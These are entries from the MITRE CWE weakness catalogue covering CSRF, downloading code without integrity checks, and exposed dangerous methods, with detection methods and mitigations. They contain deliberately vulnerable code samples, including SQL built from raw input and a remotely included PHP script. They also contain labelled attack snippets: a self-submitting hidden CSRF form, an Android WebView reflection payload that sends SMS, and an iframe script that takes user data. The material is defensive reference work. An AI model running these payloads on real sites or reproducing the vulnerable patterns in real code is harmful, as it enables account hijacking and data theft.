Effectiveness: SOAR High

Dynamic Analysis with manual results interpretation

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Fuzz Tester

  • Framework-based Fuzzer

Effectiveness: SOAR High

Manual Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Focused Manual Spotcheck - Focused manual analysis of source

  • Manual Source Code Review (not inspections)

Effectiveness: SOAR Partial

Automated Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Source code Weakness Analyzer

  • Context-configured Source Code Weakness Analyzer

Effectiveness: SOAR Partial

Architecture / Design Review

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)

  • Formal Methods / Correct-By-Construction

Effectiveness: SOAR Partial

+ Demonstrative Examples

Example 1

This example PHP code attempts to secure the form submission process by validating that the user submitting the form has a valid session. A CSRF attack would not be prevented by this countermeasure because the attacker forges a request through the user's web browser in which a valid session already exists.

The following HTML is intended to allow a user to update a profile.

(Bad Code)
Example Language: HTML 
<form action="/url/profile.php" method="post">
<input type="text" name="firstname"/>
<input type="text" name="lastname"/>
<br/>
<input type="text" name="email"/>
<input type="submit" name="submit" value="Update"/>
</form>

profile.php contains the following code.

(Bad Code)
Example Language: PHP 
// initiate the session in order to validate sessions

session_start();

//if the session is registered to a valid user then allow update

if (! session_is_registered("username")) {

echo "invalid session detected!";

// Redirect user to login page
[...]

exit;
}

// The user session is valid, so process the request
// and update the information

update_profile();

function update_profile() {
// read in the data from $_POST and send an update
// to the database
SendUpdateToDatabase($_SESSION['username'], $_POST['email']);
[...]
echo "Your profile has been successfully updated.";
}

This code may look protected since it checks for a valid session. However, CSRF attacks can be staged from virtually any tag or HTML construct, including image tags, links, embed or object tags, or other attributes that load background images.

The attacker can then host code that will silently change the name and email address of any user who visits the page while logged in to the target web application. The code might be an innocent-looking web page such as:

(Attack)
Example Language: HTML 
<SCRIPT>
function SendAttack () {
form.email.value = "attacker@example.com";
// send to profile.php
form.submit();
}
</SCRIPT>

<BODY onload="javascript:SendAttack();">

<form action="http://victim.example.com/profile.php" id="form" method="post">
<input type="hidden" name="firstname" value="Funny">
<input type="hidden" name="lastname" value="Joke">
<br/>
<input type="hidden" name="email">
</form>

Notice that the form contains only hidden fields, so when the page is loaded into the browser, the user will not see it. Because SendAttack() is defined in the body's onload attribute, it will be automatically called when the victim loads the web page.

Assuming that the user is already logged in to victim.example.com, profile.php will see that a valid user session has been established, then update the email address to the attacker's own address. At this stage, the user's identity has been compromised, and messages sent through this profile could be sent to the attacker's address.

+ Observed Examples
ReferenceDescription
Add user accounts via a URL in an img tag
Add user accounts via a URL in an img tag
Arbitrary code execution by specifying the code in a crafted img tag or URL
Gain administrative privileges via a URL in an img tag
Delete a victim's information via a URL or an img tag
Change another user's settings via a URL or an img tag
Perform actions as administrator via a URL or an img tag
Modify password for the administrator
CMS allows modification of configuration via CSRF attack against the administrator
web interface allows password changes or stopping a virtual machine via CSRF
+ Potential Mitigations

Phase: Architecture and Design

Strategy: Libraries or Frameworks

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

For example, use anti-CSRF packages such as the OWASP CSRFGuard. [R.352.3]

Another example is the ESAPI Session Management control, which includes a component for CSRF. [R.352.9]

Phase: Implementation

Ensure that the application is free of cross-site scripting issues (CWE-79), because most CSRF defenses can be bypassed using attacker-controlled script.

Phase: Architecture and Design

Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330). [R.352.5]

Note that this can be bypassed using XSS (CWE-79).
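
As an illustration only (not part of the original entry), a minimal PHP sketch of this nonce approach is shown below; the field name csrf_token and the surrounding request handling are assumptions, and PHP 7 or later is assumed for random_bytes().

(Good Code)
Example Language: PHP 
// Sketch for profile.php: a per-session nonce is generated once, echoed into the
// form as a hidden field named csrf_token, and re-checked here before the update.
session_start();
if (empty($_SESSION['csrf_token'])) {
$_SESSION['csrf_token'] = bin2hex(random_bytes(32)); // unpredictable value (CWE-330)
}
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
if (!isset($_POST['csrf_token']) || !hash_equals($_SESSION['csrf_token'], $_POST['csrf_token'])) {
echo "invalid request";
exit;
}
update_profile();
}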

Phase: Architecture and Design

Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

Note that this can be bypassed using XSS (CWE-79).

Phase: Architecture and Design

Use the "double-submitted cookie" method as described by Felten and Zeller:

When a user visits a site, the site should generate a pseudorandom value and set it as a cookie on the user's machine. The site should require every form submission to include this value as a form value and also as a cookie value. When a POST request is sent to the site, the request should only be considered valid if the form value and the cookie value are the same.

Because of the same-origin policy, an attacker cannot read or modify the value stored in the cookie. To successfully submit a form on behalf of the user, the attacker would have to correctly guess the pseudorandom value. If the pseudorandom value is cryptographically strong, this will be prohibitively difficult.

This technique requires Javascript, so it may not work for browsers that have Javascript disabled. [R.352.4]

Note that this can probably be bypassed using XSS (CWE-79), or when using web technologies that enable the attacker to read raw headers from HTTP requests.
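
Purely as a sketch of the server-side comparison described above (the name csrf_cookie is illustrative, and the client-side JavaScript that copies the cookie value into the form is omitted):

(Good Code)
Example Language: PHP 
// Sketch: set a pseudorandom cookie once per visitor (HttpOnly is intentionally
// left off so page script can read it), then require the same value in the form.
if (!isset($_COOKIE['csrf_cookie'])) {
$value = bin2hex(random_bytes(32));
setcookie('csrf_cookie', $value, 0, '/', '', true, false);
$_COOKIE['csrf_cookie'] = $value;
}
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
// The request is only considered valid if the form value and cookie value match.
if (!isset($_POST['csrf_cookie'], $_COOKIE['csrf_cookie']) || !hash_equals($_COOKIE['csrf_cookie'], $_POST['csrf_cookie'])) {
echo "invalid request";
exit;
}
}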

Phase: Architecture and Design

Do not use the GET method for any request that triggers a state change.

Phase: Implementation

Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

Note that this can be bypassed using XSS (CWE-79). An attacker could use XSS to generate a spoofed Referer, or to generate a malicious request from a page whose Referer would be allowed.
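
A rough PHP sketch of such a check follows; the expected host name is an assumption, and a missing Referer must be handled according to local policy:

(Good Code)
Example Language: PHP 
// Sketch: coarse Referer screening, intended only as a defense-in-depth measure.
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
$host = parse_url($referer, PHP_URL_HOST);
if ($host !== 'victim.example.com') {
// Missing or unexpected Referer: reject, or fall back to a confirmation step.
echo "request rejected";
exit;
}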

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
RequiresWeakness BaseWeakness Base346Origin Validation Error
Research Concepts1000
RequiresWeakness ClassWeakness Class441Unintended Proxy or Intermediary ('Confused Deputy')
Research Concepts1000
RequiresWeakness BaseWeakness Base613Insufficient Session Expiration
Research Concepts1000
RequiresWeakness ClassWeakness Class642External Control of Critical State Data
Research Concepts1000
ChildOfWeakness ClassWeakness Class345Insufficient Verification of Data Authenticity
Development Concepts (primary)699
Research Concepts (primary)1000
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ChildOfCategoryCategory442Web Problems
Development Concepts699
ChildOfCategoryCategory716OWASP Top Ten 2007 Category A5 - Cross Site Request Forgery (CSRF)
Weaknesses in OWASP Top Ten (2007) (primary)629
ChildOfCategoryCategory7512009 Top 25 - Insecure Interaction Between Components
Weaknesses in the 2009 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)750
ChildOfCategoryCategory8012010 Top 25 - Insecure Interaction Between Components
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfCategoryCategory814OWASP Top Ten 2010 Category A5 - Cross-Site Request Forgery(CSRF)
Weaknesses in OWASP Top Ten (2010) (primary)809
ChildOfCategoryCategory8642011 Top 25 - Insecure Interaction Between Components
Weaknesses in the 2011 CWE/SANS Top 25 Most Dangerous Software Errors (primary)900
ChildOfCategoryCategory936OWASP Top Ten 2013 Category A8 - Cross-Site Request Forgery (CSRF)
Weaknesses in OWASP Top Ten (2013) (primary)928
MemberOfViewView635Weaknesses Used by NVD
Weaknesses Used by NVD (primary)635
MemberOfViewView884CWE Cross-section
CWE Cross-section (primary)884
PeerOfWeakness BaseWeakness Base79Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Research Concepts1000
+ Relationship Notes

This can be resultant from XSS, although XSS is not necessarily required.

+ Research Gaps

This issue was under-reported in CVE until around 2008, when it began to gain prominence. It is likely to be present in most web applications.

+ Theoretical Notes

The CSRF topology is multi-channel:

1. Attacker (as outsider) to intermediary (as user). The interaction point is either an external or internal channel.

2. Intermediary (as user) to server (as victim). The activation point is an internal channel.

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
PLOVERCross-Site Request Forgery (CSRF)
OWASP Top Ten 2007A5ExactCross Site Request Forgery (CSRF)
WASC9Cross-site Request Forgery
+ References
[R.352.1] [REF-17] Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 2: Web-Server Related Vulnerabilities (XSS, XSRF, and Response Splitting)." Page 37. McGraw-Hill. 2010.
[R.352.2] Peter W. "Cross-Site Request Forgeries (Re: The Dangers of Allowing Users to Post Images)". Bugtraq. <http://marc.info/?l=bugtraq&m=99263135911884&w=2>.
[R.352.3] OWASP. "Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet". <http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet>.
[R.352.4] Edward W. Felten and William Zeller. "Cross-Site Request Forgeries: Exploitation and Prevention". 2008-10-18. <http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.147.1445>.
[R.352.5] Robert Auger. "CSRF - The Cross-Site Request Forgery (CSRF/XSRF) FAQ". <http://www.cgisecurity.com/articles/csrf-faq.shtml>.
[R.352.6] "Cross-site request forgery". Wikipedia. 2008-12-22. <http://en.wikipedia.org/wiki/Cross-site_request_forgery>.
[R.352.7] Jason Lam. "Top 25 Series - Rank 4 - Cross Site Request Forgery". SANS Software Security Institute. 2010-03-03. <http://software-security.sans.org/blog/2010/03/03/top-25-series-rank-4-cross-site-request-forgery>.
[R.352.8] Jeff Atwood. "Preventing CSRF and XSRF Attacks". 2008-10-14. <http://www.codinghorror.com/blog/2008/10/preventing-csrf-and-xsrf-attacks.html>.
[R.352.9] [REF-21] OWASP. "OWASP Enterprise Security API (ESAPI) Project". <http://www.owasp.org/index.php/ESAPI>.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
PLOVERExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Alternate_Terms, Description, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings
2009-01-12CWE Content TeamMITREInternal
updated Applicable_Platforms, Description, Likelihood_of_Exploit, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationship_Notes, Relationships, Research_Gaps, Theoretical_Notes
2009-03-10CWE Content TeamMITREInternal
updated Potential_Mitigations
2009-05-20Tom StracenerExternal
Added demonstrative example for profile.
2009-05-27CWE Content TeamMITREInternal
updated Demonstrative_Examples, Related_Attack_Patterns
2009-12-28CWE Content TeamMITREInternal
updated Common_Consequences, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, Observed_Examples, Potential_Mitigations, Time_of_Introduction
2010-02-16CWE Content TeamMITREInternal
updated Applicable_Platforms, Detection_Factors, References, Relationships, Taxonomy_Mappings
2010-06-21CWE Content TeamMITREInternal
updated Common_Consequences, Detection_Factors, Potential_Mitigations, References, Relationships
2010-09-27CWE Content TeamMITREInternal
updated Potential_Mitigations
2011-03-29CWE Content TeamMITREInternal
updated Description
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2011-06-27CWE Content TeamMITREInternal
updated Relationships
2011-09-13CWE Content TeamMITREInternal
updated Potential_Mitigations, References
2012-05-11CWE Content TeamMITREInternal
updated Related_Attack_Patterns, Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2013-02-21CWE Content TeamMITREInternal
updated Relationships
2013-07-17CWE Content TeamMITREInternal
updated References, Relationships
2014-07-30CWE Content TeamMITREInternal
updated Detection_Factors
2015-12-07CWE Content TeamMITREInternal
updated Relationships

CWE-494: Download of Code Without Integrity Check

Weakness ID: 494
Abstraction: Base
Status: Draft
+ Description

Description Summary

The product downloads source code or an executable from a remote location and executes the code without sufficiently verifying the origin and integrity of the code.

Extended Description

An attacker can execute malicious code by compromising the host server, performing DNS spoofing, or modifying the code in transit.

+ Time of Introduction
  • Architecture and Design
  • Implementation
+ Applicable Platforms

Languages

Language-independent

+ Common Consequences
ScopeEffect
Integrity
Availability
Confidentiality
Other

Technical Impact: Execute unauthorized code or commands; Alter execution logic; Other

Executing untrusted code could compromise the control flow of the program. The untrusted code could execute attacker-controlled commands, read or modify sensitive resources, or prevent the software from functioning correctly for legitimate users.

+ Likelihood of Exploit

Medium

+ Detection Methods

Manual Analysis

This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.

Specifically, manual static analysis is typically required to find the behavior that triggers the download of code, and to determine whether integrity-checking methods are in use.

These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules.

Black Box

Use monitoring tools that examine the software's process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic.

Attach the monitor to the process and also sniff the network connection. Trigger features related to product updates or plugin installation, which is likely to force a code download. Monitor when files are downloaded and separately executed, or if they are otherwise read back into the process. Look for evidence of cryptographic library calls that use integrity checking.

+ Demonstrative Examples

Example 1

This example loads an external class from a local subdirectory.

(Bad Code)
Example Language: Java 
URL[] classURLs = new URL[]{
new URL("file:subdir/")
};
URLClassLoader loader = new URLClassLoader(classURLs);
Class loadedClass = Class.forName("loadMe", true, loader);

This code does not ensure that the class loaded is the intended one, for example by verifying the class's checksum. An attacker may be able to modify the class file to execute malicious code.

Example 2

This code includes an external script to get database credentials, then authenticates a user against the database, allowing access to the application.

(Bad Code)
Example Language: PHP 
//assume the password is already encrypted, avoiding CWE-312
function authenticate($username,$password){
include("http://external.example.com/dbInfo.php");
//dbInfo.php makes $dbhost, $dbuser, $dbpass, $dbname available
mysql_connect($dbhost, $dbuser, $dbpass) or die ('Error connecting to mysql');
mysql_select_db($dbname);
$query = "Select * from users where username='$username' And password='$password'";
$result = mysql_query($query);
if(mysql_num_rows($result) == 1){
mysql_close();
return true;
}
else{
mysql_close();
return false;
}
}

This code does not verify that the external domain accessed is the intended one. An attacker may somehow cause the external domain name to resolve to an attack server, which would provide the information for a false database. The attacker may then steal the usernames and encrypted passwords from real user login attempts, or simply allow himself to access the application without a real user account.

This example is also vulnerable to a Man in the Middle (CWE-300) attack.
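
To illustrate one possible integrity check for this PHP example (the expected hash value, the local file path, and the distribution workflow are assumptions, not a recommendation of a specific design):

(Good Code)
Example Language: PHP 
// Sketch: fetch the remote code, verify it against a digest published out-of-band
// by the code provider, and only include it after the check succeeds.
$expectedHash = 'replace-with-published-sha256-digest';
$code = file_get_contents('http://external.example.com/dbInfo.php');
if ($code === false || !hash_equals($expectedHash, hash('sha256', $code))) {
die('Integrity check of remote code failed');
}
$localCopy = '/var/app/includes/dbInfo_verified.php';
file_put_contents($localCopy, $code);
include($localCopy);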

+ Observed Examples
ReferenceDescription
OS does not verify authenticity of its own updates.
online poker client does not verify authenticity of its own updates.
anti-virus product does not verify automatic updates for itself.
VOIP phone downloads applications from web sites without verifying integrity.
+ Potential Mitigations

Phase: Implementation

Perform proper forward and reverse DNS lookups to detect DNS spoofing.

This is only a partial solution since it will not prevent your code from being modified on the hosting site or in transit.

Phases: Architecture and Design; Operation

Encrypt the code with a reliable encryption scheme before transmitting.

This will only be a partial solution, since it will not detect DNS spoofing and it will not prevent your code from being modified on the hosting site.

Phase: Architecture and Design

Strategy: Libraries or Frameworks

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

Specifically, it may be helpful to use tools or frameworks to perform integrity checking on the transmitted code.

  • When providing code that is to be downloaded, such as for automatic updates of the software, use cryptographic signatures for the code and modify the download clients to verify the signatures; a brief verification sketch follows this list. Ensure that the implementation does not contain CWE-295, CWE-320, CWE-347, and related weaknesses.

  • Use code signing technologies such as Authenticode. See references [R.494.1] [R.494.2] [R.494.3].
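
As a hedged illustration of client-side signature verification (the key handling, file names, and signing workflow shown are assumptions):

(Good Code)
Example Language: PHP 
// Sketch: verify a detached signature over a downloaded update before using it.
$update = file_get_contents('/tmp/update.pkg');
$signature = file_get_contents('/tmp/update.pkg.sig');
$publicKey = openssl_pkey_get_public(file_get_contents('/etc/myapp/update_pubkey.pem'));
if ($update === false || $signature === false || $publicKey === false ||
openssl_verify($update, $signature, $publicKey, OPENSSL_ALGO_SHA256) !== 1) {
die('Update rejected: signature verification failed');
}
// Only a successfully verified update is installed.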

Phases: Architecture and Design; Operation

Strategy: Environment Hardening

Run your code using the lowest privileges that are required to accomplish the necessary tasks [R.494.7]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.

Phases: Architecture and Design; Operation

Strategy: Sandbox or Jail

Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.

OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.

This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.

Be careful to avoid CWE-243 and other weaknesses related to jails.

Effectiveness: Limited

The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfCategoryCategory490Mobile Code Issues
Development Concepts (primary)699
ChildOfWeakness ClassWeakness Class669Incorrect Resource Transfer Between Spheres
Research Concepts (primary)1000
ChildOfCategoryCategory7522009 Top 25 - Risky Resource Management
Weaknesses in the 2009 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)750
ChildOfCategoryCategory8022010 Top 25 - Risky Resource Management
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfCategoryCategory859CERT Java Secure Coding Section 14 - Platform Security (SEC)
Weaknesses Addressed by the CERT Java Secure Coding Standard (primary)844
ChildOfCategoryCategory8652011 Top 25 - Risky Resource Management
Weaknesses in the 2011 CWE/SANS Top 25 Most Dangerous Software Errors (primary)900
ChildOfCategoryCategory991SFP Secondary Cluster: Tainted Input to Environment
Software Fault Pattern (SFP) Clusters (primary)888
PeerOfWeakness BaseWeakness Base79Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Research Concepts1000
MemberOfViewView884CWE Cross-section
CWE Cross-section (primary)884
CanFollowWeakness BaseWeakness Base79Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Research Concepts1000
+ Research Gaps

This is critical for mobile code, but it is likely to become more and more common as developers continue to adopt automated, network-based product distributions and upgrades. Software-as-a-Service (SaaS) might introduce additional subtleties. Common exploitation scenarios may include ad server compromises and bad upgrades.

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
CLASPInvoking untrusted mobile code
CERT Java Secure CodingSEC06-JDo not rely on the default automatic signature verification provided by URLClassLoader and java.util.jar
Software Fault PatternsSFP27Tainted input to environment
+ References
[R.494.1] Microsoft. "Introduction to Code Signing". <http://msdn.microsoft.com/en-us/library/ms537361(VS.85).aspx>.
[R.494.3] Apple. "Code Signing Guide". Apple Developer Connection. 2008-11-19. <http://developer.apple.com/documentation/Security/Conceptual/CodeSigningGuide/Introduction/chapter_1_section_1.html>.
[R.494.4] Anthony Bellissimo, John Burgess and Kevin Fu. "Secure Software Updates: Disappointments and New Challenges". <http://prisms.cs.umass.edu/~kevinfu/papers/secureupdates-hotsec06.pdf>.
[R.494.5] [REF-17] Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 18: The Sins of Mobile Code." Page 267. McGraw-Hill. 2010.
[R.494.6] Johannes Ullrich. "Top 25 Series - Rank 20 - Download of Code Without Integrity Check". SANS Software Security Institute. 2010-04-05. <http://blogs.sans.org/appsecstreetfighter/2010/04/05/top-25-series-rank-20-download-code-integrity-check/>.
[R.494.7] [REF-31] Sean Barnum and Michael Gegick. "Least Privilege". 2005-09-14. <https://buildsecurityin.us-cert.gov/daisy/bsi/articles/knowledge/principles/351.html>.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
CLASPExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Other_Notes, Taxonomy_Mappings
2009-01-12CWE Content TeamMITREInternal
updated Applicable_Platforms, Common_Consequences, Description, Name, Other_Notes, Potential_Mitigations, References, Relationships, Research_Gaps, Type
2009-03-10CWE Content TeamMITREInternal
updated Potential_Mitigations
2009-07-27CWE Content TeamMITREInternal
updated Description, Observed_Examples, Related_Attack_Patterns
2010-02-16CWE Content TeamMITREInternal
updated Detection_Factors, References, Relationships
2010-04-05CWE Content TeamMITREInternal
updated Applicable_Platforms
2010-06-21CWE Content TeamMITREInternal
updated Common_Consequences, Detection_Factors, Potential_Mitigations, References
2010-09-27CWE Content TeamMITREInternal
updated Potential_Mitigations, References
2010-12-13CWE Content TeamMITREInternal
updated Potential_Mitigations
2011-03-29CWE Content TeamMITREInternal
updated Demonstrative_Examples
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Relationships, Taxonomy_Mappings
2011-06-27CWE Content TeamMITREInternal
updated Relationships
2011-09-13CWE Content TeamMITREInternal
updated Potential_Mitigations, References
2012-05-11CWE Content TeamMITREInternal
updated References, Relationships, Taxonomy_Mappings
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2014-07-30CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11Mobile Code: Invoking Untrusted Mobile Code
2009-01-12Download of Untrusted Mobile Code Without Integrity Check

CWE-749: Exposed Dangerous Method or Function

Weakness ID: 749
Abstraction: Base
Status: Incomplete
+ Description

Description Summary

The software provides an Application Programming Interface (API) or similar interface for interaction with external actors, but the interface includes a dangerous method or function that is not properly restricted.

Extended Description

This weakness can lead to a wide variety of resultant weaknesses, depending on the behavior of the exposed method. It can apply to any number of technologies and approaches, such as ActiveX controls, Java functions, IOCTLs, and so on.

The exposure can occur in a few different ways:

1) The function/method was never intended to be exposed to outside actors.

2) The function/method was only intended to be accessible to a limited set of actors, such as Internet-based access from a single web site.

+ Time of Introduction
  • Architecture and Design
  • Implementation
+ Applicable Platforms

Languages

Language-independent

+ Common Consequences
ScopeEffect
Integrity
Confidentiality
Availability
Access Control
Other

Technical Impact: Gain privileges / assume identity; Read application data; Modify application data; Execute unauthorized code or commands; Other

Exposing critical functionality essentially provides an attacker with the privilege level of the exposed functionality. This could result in the modification or exposure of sensitive data or possibly even execution of arbitrary code.

+ Likelihood of Exploit

Low to Medium

+ Demonstrative Examples

Example 1

In the following Java example the method removeDatabase will delete the database with the name specified in the input parameter.

(Bad Code)
Example Language: Java 
public void removeDatabase(String databaseName) {
try {
Statement stmt = conn.createStatement();
stmt.execute("DROP DATABASE " + databaseName);

} catch (SQLException ex) {...}
}

The method in this example is declared public and therefore is exposed to any class in the application. Deleting a database should be considered a critical operation within an application, and access to this potentially dangerous method should be restricted. Within Java, this can be accomplished simply by declaring the method private, thereby exposing it only to the enclosing class, as in the following example.

(Good Code)
Example Language: Java 
private void removeDatabase(String databaseName) {
try {
Statement stmt = conn.createStatement();
stmt.execute("DROP DATABASE " + databaseName);

} catch (SQLException ex) {...}
}

Example 2

These Android and iOS applications intercept URL loading within a WebView and perform special actions if a particular URL scheme is used, thus allowing the Javascript within the WebView to communicate with the application:

(Bad Code)
Example Language: Java 
// Android

@Override
public boolean shouldOverrideUrlLoading(WebView view, String url){
if (url.substring(0,14).equalsIgnoreCase("examplescheme:")){
if(url.substring(14,25).equalsIgnoreCase("getUserInfo")){
writeDataToView(view, UserData);
return false;
}
else{
return true;
}
}
// URLs that do not use the custom scheme are loaded normally.
return false;
}
(Bad Code)
Example Language: Objective-C 
// iOS

-(BOOL) webView:(UIWebView *)exWebView shouldStartLoadWithRequest:(NSURLRequest *)exRequest navigationType:(UIWebViewNavigationType)exNavigationType
{
NSURL *URL = [exRequest URL];
if ([[URL scheme] isEqualToString:@"exampleScheme"])
{
NSString *functionString = [URL resourceSpecifier];
if ([functionString hasPrefix:@"specialFunction"])
{
// Make data available back in webview.
UIWebView *webView = [self writeDataToView:[URL query]];
}
return NO;
}
return YES;
}

A call into native code can then be initiated by passing parameters within the URL:

(Attack)
Example Language: Javascript 
window.location = "examplescheme://method?parameter=value";

Because the application does not check the source, a malicious website loaded within this WebView has the same access to the API as a trusted site.

Example 3

This application uses a WebView to display websites, and creates a Javascript interface to a Java object to allow enhanced functionality on a trusted website:

(Bad Code)
Example Language: Java 
public class WebViewGUI extends Activity {
WebView mainWebView;

public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
mainWebView = new WebView(this);
mainWebView.getSettings().setJavaScriptEnabled(true);
mainWebView.addJavascriptInterface(new JavaScriptInterface(), "userInfoObject");
mainWebView.loadUrl("file:///android_asset/www/index.html");
setContentView(mainWebView);
}

final class JavaScriptInterface {
JavaScriptInterface () {}

public String getUserInfo() {
return currentUser.Info();
}
}
}

Before Android 4.2, all methods, including inherited ones, are exposed to Javascript when using addJavascriptInterface(). This means that a malicious website loaded within this WebView can use reflection to acquire a reference to arbitrary Java objects, which allows the website code to perform any action that the parent application is authorized to perform.

For example, if the application has permission to send text messages:

(Attack)
Example Language: Javascript 
<script>
userInfoObject.getClass().forName('android.telephony.SmsManager').getMethod('getDefault',null).invoke(null,null).sendTextMessage(attackNumber, null, attackMessage, null, null);
</script>

This malicious script can use the userInfoObject object to load the SmsManager object and send arbitrary text messages to any recipient.

Example 4

After Android 4.2, only methods annotated with @JavascriptInterface are available in JavaScript, which blocks access to getClass() by default, as in this example:

(Bad Code)
Example Language: Java 
final class JavaScriptInterface {
JavaScriptInterface () { }

@JavascriptInterface
public String getUserInfo() {
return currentUser.Info();
}
}

This code is not vulnerable to the above attack, but still may expose user info to malicious pages loaded in the WebView. Even malicious iframes loaded within a trusted page may access the exposed interface:

(Attack)
Example Language: Javascript 
<script>
var info = window.userInfoObject.getUserInfo();
sendUserInfo(info);
</script>

This malicious code within an iframe is able to access the interface object and steal the user's data.

+ Observed Examples
ReferenceDescription
arbitrary Java code execution via exposed method
security tool ActiveX control allows download or upload of files
+ Potential Mitigations

Phase: Architecture and Design

If you must expose a method, make sure to perform input validation on all arguments, limit access to authorized parties, and protect against all possible vulnerabilities.
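
A minimal PHP sketch of this idea, with hypothetical role and function names:

(Good Code)
Example Language: PHP 
// Sketch: if a dangerous operation must be exposed, validate its arguments and
// restrict it to authorized callers before doing anything else.
function removeDatabase($databaseName, $callerRole) {
if ($callerRole !== 'admin') {
throw new RuntimeException('caller is not authorized to drop databases');
}
if (!preg_match('/^[A-Za-z0-9_]+$/', $databaseName)) {
throw new InvalidArgumentException('invalid database name');
}
// ... perform the drop using a restricted database account ...
}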

Phases: Architecture and Design; Implementation

Strategy: Identify and Reduce Attack Surface

Identify all exposed functionality. Explicitly list all functionality that must be exposed to some user or set of users. Identify which functionality may be:

  • accessible to all users

  • restricted to a small set of privileged users

  • prevented from being directly accessible at all

Ensure that the implemented code follows these expectations. This includes setting the appropriate access modifiers where applicable (public, private, protected, etc.) or not marking ActiveX controls safe-for-scripting.

+ Weakness Ordinalities
OrdinalityDescription
Primary
(where the weakness exists independent of other weaknesses)
+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class485Insufficient Encapsulation
Development Concepts (primary)699
Research Concepts (primary)1000
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ChildOfWeakness ClassWeakness Class691Insufficient Control Flow Management
Research Concepts1000
ChildOfCategoryCategory8082010 Top 25 - Weaknesses On the Cusp
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfCategoryCategory975SFP Secondary Cluster: Architecture
Software Fault Pattern (SFP) Clusters (primary)888
ParentOfWeakness BaseWeakness Base618Exposed Unsafe ActiveX Method
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant782Exposed IOCTL with Insufficient Access Control
Development Concepts (primary)699
Research Concepts (primary)1000
+ Research Gaps

Under-reported and under-studied. This weakness could appear in any technology, language, or framework that allows the programmer to provide a functional interface to external parties, but it is not heavily reported. In 2007, CVE began showing a notable increase in reports of exposed method vulnerabilities in ActiveX applications, as well as IOCTL access to OS-level resources. These weaknesses have been documented for Java applications in various secure programming sources, but there are few reports in CVE, which suggests limited awareness in most parts of the vulnerability research community.

+ Content History
Submissions
Submission DateSubmitterOrganizationSource
